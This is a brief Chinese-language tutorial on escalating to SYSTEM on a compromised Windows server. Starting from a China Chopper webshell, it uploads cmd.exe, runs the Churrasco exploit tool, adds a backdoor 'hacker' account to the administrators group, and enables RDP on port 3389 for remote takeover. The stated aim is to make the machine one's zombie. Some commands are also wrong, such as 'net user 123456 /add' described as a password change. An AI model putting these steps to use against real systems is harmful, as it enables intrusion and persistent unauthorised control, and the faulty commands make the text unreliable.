Window基礎提權
提到system權限 甚至讓他變成你的肉雞
我們了解一下windows下面有那些用戶
Guests是用戶最低的權限 而且一般是被禁用的
User權限也很低
連關機都不行
還有window系統內置用戶組
只對本站的主目錄有讀寫修改的權限
Net user 顯示你當前系統有那些用戶賬號
Net user administrator是顯示當前用戶的詳細信息
Net user guest 從來沒有登錄 過 未啟用 屬於guests組的成員
添加用戶
Net user hacker 123 /add
Net user 123456 /add (更改hacker的密碼為123456)
Net user hacker /del 將hacker用戶刪除
啟用賬號 或者禁用賬號
Net user guest /active:yes (啟用賬號)
禁用的話將active:no
Net localgroup 顯示當前系統里面所有的組
Net localgroup administrator 后面加的是一個組的名稱 查看administrator組有哪些成員
Net localgroup administrator hacker /add
將hacker添加到管理員組
Net localgroup administrator hacker /del
將hacker從管理員組中刪除
提權實戰
1 whoami 查看我是誰
這里看到是管理員
但是在菜刀連接的里面
拒絕訪問
此時我們怎么辦吶
方法一
上傳一個cmd.exe
這是自己的cmd
此時我們再次嘗試添加用戶
很遺憾失敗了
這時我們要用到提權軟件了
上傳提權軟件
切換到軟件路徑
然后利用工具的語法
進行提權
Churrasco “命令”
接下來我們看他3389端口開放沒有
Netstat –an 查看端口開放情況
如果沒開怎么辦
同樣利用工具
兩個工具同時使用
3389.bat 3389.vs
端口都開啟了
Mstsc 遠程桌面
連接成功
